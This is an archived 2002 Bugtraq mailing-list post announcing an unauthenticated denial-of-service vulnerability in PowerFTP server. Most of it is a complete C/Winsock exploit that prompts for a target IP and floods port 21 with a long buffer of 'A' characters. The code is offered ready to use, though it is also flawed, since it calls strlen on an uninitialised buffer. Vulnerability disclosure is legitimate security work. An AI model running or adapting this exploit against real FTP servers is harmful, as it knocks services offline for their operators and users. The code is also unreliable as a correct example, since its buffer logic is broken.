[27310] in bugtraq
Vulnerabilitie in PowerFTP server
daemon@ATHENA.MIT.EDU (Armand Morgan)
Sat Oct 5 13:52:41 2002
Date: 5 Oct 2002 12:27:44 -0000
Message-ID: <20021005122744.917.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Armand Morgan <morgan53@evhr.net>
To: bugtraq@securityfocus.com
I've found a DoS vulnerability in PowerFTP. He doesn't need an account on
the server. Just send many information at the variable USER. You could
see the xploit :
/* Remote DoS Exploit for PowerFTP server (all version) */
/* Coding by Morgan A. member of secureNT-2000 Greetz : */
/* kdm, Yann, GaLiaRepT, and all i've forgotten ;) */
#include <stdio.h>
#include <winsock.h>
#pragma comment(lib, "wsock32.lib")
void main()
{
WSADATA WSAData;
WSAStartup(MAKEWORD(2,0), &WSAData);
SOCKET sock;
SOCKADDR_IN sin;
char *buffer = new char[255];
char ip[50];
printf ("Remote DoS Exploit for PowerFTP server\n\n");
printf ("Remote IP: ");
scanf ("%s", &ip);
char DoS[3000];
int i;
for(i=0;i<strlen(DoS);i++)
{
DoS[i]= 'A';
}
sock = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_addr.s_addr = inet_addr(ip);
sin.sin_family = AF_INET;
sin.sin_port = htons(21);
connect(sock, (SOCKADDR *)&sin, sizeof(sin));
send(sock, DoS, sizeof(DoS), 0);
closesocket(sock);
WSACleanup();
}
